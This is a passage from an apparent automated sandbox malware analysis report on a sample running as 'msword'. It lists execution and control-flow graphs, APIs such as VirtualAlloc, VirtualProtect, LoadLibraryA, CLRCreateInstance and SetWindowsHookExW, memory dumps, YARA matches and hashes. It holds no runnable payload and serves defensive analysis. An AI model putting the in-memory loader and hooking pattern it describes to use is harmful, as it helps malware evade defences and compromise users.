                                                                                                        • Instruction Fuzzy Hash: B701DFA270E3D26FC72616681820756EF721FC311072A5097C190CF293CD19CC4683EA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:4.4%
                                                                                                        Dynamic/Decrypted Code Coverage:82.2%
                                                                                                        Signature Coverage:4.4%
                                                                                                        Total number of Nodes:45
                                                                                                        Total number of Limit Nodes:1
                                                                                                        execution_graph 37551 7ffd997b2648 37553 7ffd997b2651 SetWindowsHookExW 37551->37553 37554 7ffd997b2721 37553->37554 37555 e9d900 37557 e9d906 37555->37557 37556 e9d939 37557->37555 37557->37556 37559 eca860 SetWaitableTimer 37557->37559 37560 eca8df 37559->37560 37560->37556 37561 eca3c0 37562 eca3e8 37561->37562 37563 eca3f9 VirtualAlloc 37561->37563 37562->37563 37513 21760f37634 VirtualAlloc 37514 21760f37650 37513->37514 37522 21760f37646 37513->37522 37515 21760f3774a LoadLibraryA 37514->37515 37516 21760f37783 37514->37516 37514->37522 37515->37514 37519 21760f37883 37516->37519 37516->37522 37523 21760f3ab64 LoadLibraryA 37516->37523 37519->37522 37543 21760f37f4e 37519->37543 37524 21760f3ab9d 37523->37524 37525 21760f3785b 37523->37525 37524->37525 37526 21760f3abf3 VirtualProtect 37524->37526 37525->37522 37533 21760f3ad6b LoadLibraryA 37525->37533 37526->37525 37527 21760f3ac1f 37526->37527 37528 21760f3ac38 VirtualProtect 37527->37528 37529 21760f3ac6a 37528->37529 37529->37525 37530 21760f3aca4 VirtualProtect 37529->37530 37530->37525 37531 21760f3accd 37530->37531 37532 21760f3ace6 VirtualProtect 37531->37532 37532->37525 37534 21760f3ad9a 37533->37534 37535 21760f3ada4 37533->37535 37534->37519 37535->37534 37536 21760f3adfa VirtualProtect 37535->37536 37536->37534 37537 21760f3ae26 37536->37537 37538 21760f3ae3f VirtualProtect 37537->37538 37539 21760f3ae71 37538->37539 37539->37534 37540 21760f3aeab VirtualProtect 37539->37540 37540->37534 37541 21760f3aed4 37540->37541 37542 21760f3aeed VirtualProtect 37541->37542 37542->37534 37544 21760f37f7b 37543->37544 37545 21760f37fae CLRCreateInstance 37544->37545 37546 21760f37fe2 37544->37546 37545->37546 37547 21760f380f4 37546->37547 37548 21760f38133 SysAllocString 37546->37548 37547->37522 37549 21760f38180 37548->37549 37549->37547 37550 21760f382f5 SafeArrayDestroy 37549->37550 37550->37547

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 294 eca860-eca8d6 SetWaitableTimer 295 eca8df-eca8e8 294->295
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: TimerWaitable
                                                                                                        • String ID:
                                                                                                        • API String ID: 1823812067-0
                                                                                                        • Opcode ID: b8d8bc20444b0f3ddb10f3260271c8a328cd586a06bbfc39b759788e7e84120b
                                                                                                        • Instruction ID: 1f940ee6cc4e580bb8c0600919ffaf3237878fa7b1390ede333d29dd4e68ef4e
                                                                                                        • Opcode Fuzzy Hash: b8d8bc20444b0f3ddb10f3260271c8a328cd586a06bbfc39b759788e7e84120b
                                                                                                        • Instruction Fuzzy Hash: 5101C476225F8085DB508B4AF8A035A7364F3C8FE4F541222EEAD87BA4CF3EC1118B00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000021760F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_21760f20000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                                                                        • Instruction ID: bf19f19609c1c55e4161a84dbdf60f901ef0b16be937d44dd493a21314bb6eea
                                                                                                        • Opcode Fuzzy Hash: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                                                                        • Instruction Fuzzy Hash: AB51DA70B18D4E8FDF84EEADC884BEE73F5FBA8311F104625A419D3294DA74E9518B81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000021760F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_21760f20000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                                                                        • Instruction ID: d37972bf96bee12720edd46bf766341fcedd9afccd93fdf88a3f59bf417e3ad8
                                                                                                        • Opcode Fuzzy Hash: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                                                                        • Instruction Fuzzy Hash: AF51DB70B1894E8FDF84EF5DC888BEE73F5FBA8311F104655A41AD3294DA74EA508B81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000021760F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_21760f20000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocArrayCreateDestroyInstanceSafeString
                                                                                                        • String ID:
                                                                                                        • API String ID: 815377780-0
                                                                                                        • Opcode ID: d6c33fbdd27555ea15998292fd2b30ed37ee76d798fb2c96181b5ec01cfddad2
                                                                                                        • Instruction ID: 8b3912b89499fb1c8c262a234be73c3d9b7c10c622251ad9bd54a9ce74234db2
                                                                                                        • Opcode Fuzzy Hash: d6c33fbdd27555ea15998292fd2b30ed37ee76d798fb2c96181b5ec01cfddad2
                                                                                                        • Instruction Fuzzy Hash: 61E17E74A08A4D9FDF88EF5CC488FDAB7F1FBA8300F1485A5A419D7255C678E985CB80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 82 21760f37634-21760f37644 VirtualAlloc 83 21760f37650-21760f376fa call 21760f3af5f call 21760f3af17 call 21760f3b402 call 21760f3b0e4 82->83 84 21760f37646-21760f3764b 82->84 94 21760f37958-21760f37959 83->94 95 21760f37700-21760f37735 call 21760f3aa54 83->95 85 21760f37a11-21760f37a19 84->85 97 21760f37965-21760f37972 94->97 103 21760f37737-21760f3773c 95->103 104 21760f37741-21760f37748 95->104 98 21760f379db-21760f37a0c call 21760f3af17 97->98 99 21760f37974-21760f37982 97->99 98->85 99->98 101 21760f37984-21760f379d1 call 21760f3af17 99->101 101->98 103->85 107 21760f37774-21760f37781 104->107 109 21760f3774a-21760f37770 LoadLibraryA 107->109 110 21760f37783-21760f3778a 107->110 109->107 112 21760f377e0-21760f377ed 110->112 113 21760f3778c-21760f377d6 call 21760f3aa54 112->113 114 21760f377ef-21760f377fc 112->114 123 21760f377dc 113->123 124 21760f3795b-21760f3795c 113->124 116 21760f377fe-21760f3780c call 21760f37a1a 114->116 117 21760f37812-21760f3781f 114->117 116->117 127 21760f3795e-21760f3795f 116->127 121 21760f37831-21760f3783d 117->121 122 21760f37821-21760f3782f 117->122 126 21760f37840-21760f3784d 121->126 122->126 123->112 124->97 128 21760f3789f-21760f378a8 126->128 129 21760f3784f-21760f37862 call 21760f3ab64 126->129 127->97 130 21760f378aa-21760f378b3 128->130 131 21760f378b5-21760f378c1 call 21760f38bb1 128->131 139 21760f37877-21760f3787e call 21760f3ad6b 129->139 140 21760f37864-21760f37871 129->140 130->131 133 21760f378c6-21760f378cf 130->133 131->97 137 21760f378dc-21760f378f1 call 21760f37f4e 133->137 138 21760f378d1-21760f378da 133->138 152 21760f37906-21760f37919 call 21760f3898b 137->152 153 21760f378f3-21760f37901 call 21760f38312 137->153 138->137 142 21760f3791b-21760f37924 138->142 145 21760f37883-21760f3788a 139->145 140->139 144 21760f37961-21760f37962 140->144 146 21760f37931-21760f3793d call 21760f396ce 142->146 147 21760f37926-21760f3792f 142->147 144->97 145->128 149 21760f3788c-21760f37899 145->149 146->97 147->146 150 21760f3793f-21760f37948 147->150 149->128 155 21760f37964 149->155 150->97 157 21760f3794a-21760f37956 call 21760f394b6 150->157 152->97 153->152 155->97 157->97
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000021760F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_21760f20000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                                                                        • Instruction ID: e292a3be4073d03602489ac5f17189853261cb2aaa64326faa593cdf1d4d7337
                                                                                                        • Opcode Fuzzy Hash: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                                                                        • Instruction Fuzzy Hash: 6BE18430A18A4D8FDF98EB9CC489FEEB7F5FBA8320F544554E509D7291D634E9818B80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 216 7ffd997b2648-7ffd997b264f 217 7ffd997b265a-7ffd997b26cd 216->217 218 7ffd997b2651-7ffd997b2659 216->218 222 7ffd997b2759-7ffd997b275d 217->222 223 7ffd997b26d3-7ffd997b26d8 217->223 218->217 224 7ffd997b26e2-7ffd997b271f SetWindowsHookExW 222->224 225 7ffd997b26df-7ffd997b26e0 223->225 226 7ffd997b2727-7ffd997b2758 224->226 227 7ffd997b2721 224->227 225->224 227->226
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2878504805.00007FFD997B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_7ffd997b0000_msword.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0
                                                                                                        • Opcode ID: f500c052bf16dc838e4a2d3f2e65aef3ea9bfde9de3f1dab0e17ad5424b1ffb3
                                                                                                        • Instruction ID: a381bb3a8b2aa53afb636bfa32e6981132d506ee2a4699fe02c4ed46c313ce9c
                                                                                                        • Opcode Fuzzy Hash: f500c052bf16dc838e4a2d3f2e65aef3ea9bfde9de3f1dab0e17ad5424b1ffb3
                                                                                                        • Instruction Fuzzy Hash: 0E310B31A1CA5D8FDB18DBACD8566F97BE1EF99321F00427ED04DC3192CE64A81287C5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 230 7ffd997b1dca-7ffd997b26cd 234 7ffd997b2759-7ffd997b275d 230->234 235 7ffd997b26d3-7ffd997b26d8 230->235 236 7ffd997b26e2-7ffd997b271f SetWindowsHookExW 234->236 237 7ffd997b26df-7ffd997b26e0 235->237 238 7ffd997b2727-7ffd997b2758 236->238 239 7ffd997b2721 236->239 237->236 239->238
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2878504805.00007FFD997B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD997B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_7ffd997b0000_msword.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HookWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2559412058-0
                                                                                                        • Opcode ID: 6ce842fb7626ffc12f53af73ce931b66b9899f79f7265be7391ec22ccebe5d98
                                                                                                        • Instruction ID: 83308d934b0e3dfc63fd0cf344207e724d495070eecf64e6bbb4b05b0540486c
                                                                                                        • Opcode Fuzzy Hash: 6ce842fb7626ffc12f53af73ce931b66b9899f79f7265be7391ec22ccebe5d98
                                                                                                        • Instruction Fuzzy Hash: 5C31E630A1CA1C8FDB58EF9CD8566F977E1EBA9311F00413EE00DD3291CE60A8028BC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 426 eca3c0-eca3e6 427 eca3e8-eca3eb 426->427 428 eca3f9-eca43f VirtualAlloc 426->428 429 eca3ed 427->429 430 eca3ef-eca3f6 427->430 429->430 430->428
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: f9e25bd1500fc878524e57a4b8c9ba2e86e3843b3906fc13af291d7eff15cb2c
                                                                                                        • Instruction ID: d98f33ab17cd94a6625af9d2e416b555fac3a75b9bbec385675c63fadd600655
                                                                                                        • Opcode Fuzzy Hash: f9e25bd1500fc878524e57a4b8c9ba2e86e3843b3906fc13af291d7eff15cb2c
                                                                                                        • Instruction Fuzzy Hash: 70F01976A11B8082DB258B5EE95131C7370F74CBD8F245126DE5DA7B24CB29E592C240
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        • runtime: signal received on thread not created by Go., xrefs: 00E9B9C9
                                                                                                        • runtime: signal received on thread not created by Go. is currently not supported for use in system callbackscasfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipmheap.freeSpanLocked - invalid free of us, xrefs: 00E9B9E6, 00E9BA14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: runtime: signal received on thread not created by Go.$runtime: signal received on thread not created by Go. is currently not supported for use in system callbackscasfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipmheap.freeSpanLocked - invalid free of us
                                                                                                        • API String ID: 0-3397814948
                                                                                                        • Opcode ID: 6b6af69df1450da7fad4ff6955e9ce3c7d62b8050473d4919b35427e20111d03
                                                                                                        • Instruction ID: 1e32aaa34c9b420d227993cf317b2c0e1d58e487750b6939d5288650ae519760
                                                                                                        • Opcode Fuzzy Hash: 6b6af69df1450da7fad4ff6955e9ce3c7d62b8050473d4919b35427e20111d03
                                                                                                        • Instruction Fuzzy Hash: 1C31C232604B85C5DB20DB21FA4136A77A1F349BD4F446632EA9C63B66EB79C041CB11
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5588274d3391cca63a727bd9069a6a885c28298313f123dd1187de873e39266b
                                                                                                        • Instruction ID: 35972462a5eb80fecb3e91e4c61553449a8e68af401103ff399b5396a00ebf22
                                                                                                        • Opcode Fuzzy Hash: 5588274d3391cca63a727bd9069a6a885c28298313f123dd1187de873e39266b
                                                                                                        • Instruction Fuzzy Hash: 1A9129B7618B8482DB10CB15F18035AB7A5F789BD4F546226EBAD63B99CF3CD056CB00
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 16365684eb0a91af27b1fd2782d38b6c83b1bafcd734c3589851a947cb9b2be4
                                                                                                        • Instruction ID: cc057f194581d20fb98d1913f930f9aacc2ca9b42e591f47ce743490432ae8d8
                                                                                                        • Opcode Fuzzy Hash: 16365684eb0a91af27b1fd2782d38b6c83b1bafcd734c3589851a947cb9b2be4
                                                                                                        • Instruction Fuzzy Hash: 947180B3718F8882DF118F55E4807AAA7A2F796BC4F54612AEB8D63B59CB7CC141C740
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e4c8d9f0a45d7d8e1196e137a7dd0fa5c9963fd3ecf31760265bbc0ea772d79f
                                                                                                        • Instruction ID: b4ba519ccfd8579f8d9b63237674ad99efa8d138c88927b64efb0be2e996d1e1
                                                                                                        • Opcode Fuzzy Hash: e4c8d9f0a45d7d8e1196e137a7dd0fa5c9963fd3ecf31760265bbc0ea772d79f
                                                                                                        • Instruction Fuzzy Hash: 2421EA36208B89C1DB10DF11F44536A77A0F34AB88F499672DEAC93B65EB7AC141CB01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000021760F20000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_21760f20000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                                                                                                        • Instruction ID: 9d40ff71812c558b94b8b85d7a05a0b6818d162a37aed9d19ecd54bfa84b7f49
                                                                                                        • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                                                                                                        • Instruction Fuzzy Hash: 22F01532208548AFEF198F58D845AEAB7F9EB58760F044069FD09D7261E232ED219BC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ccc54ba7e80b05d85774d5f23224d9c9913cadd2b736cb14ac84a3b3d583271e
                                                                                                        • Instruction ID: 1ee1391ee407d420473c77139173024179a9187e48038b082c46b267b8fc149a
                                                                                                        • Opcode Fuzzy Hash: ccc54ba7e80b05d85774d5f23224d9c9913cadd2b736cb14ac84a3b3d583271e
                                                                                                        • Instruction Fuzzy Hash: D2E0EC25624E8080D6304B19E8413567720F7887B4F540322AEBD077E4CE39C2228F40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.2866114630.0000000000E71000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E70000, based on PE: true
                                                                                                        • Associated: 00000011.00000002.2866050873.0000000000E70000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866246328.0000000000ED6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F8F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000F95000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866379381.0000000000FBD000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866699219.0000000000FC2000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        • Associated: 00000011.00000002.2866748845.0000000000FC3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_e70000_msword.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b97e02377cf304a997ff4b3dfa74e19cf59a122f1d453d45a10fea54f56bd52f
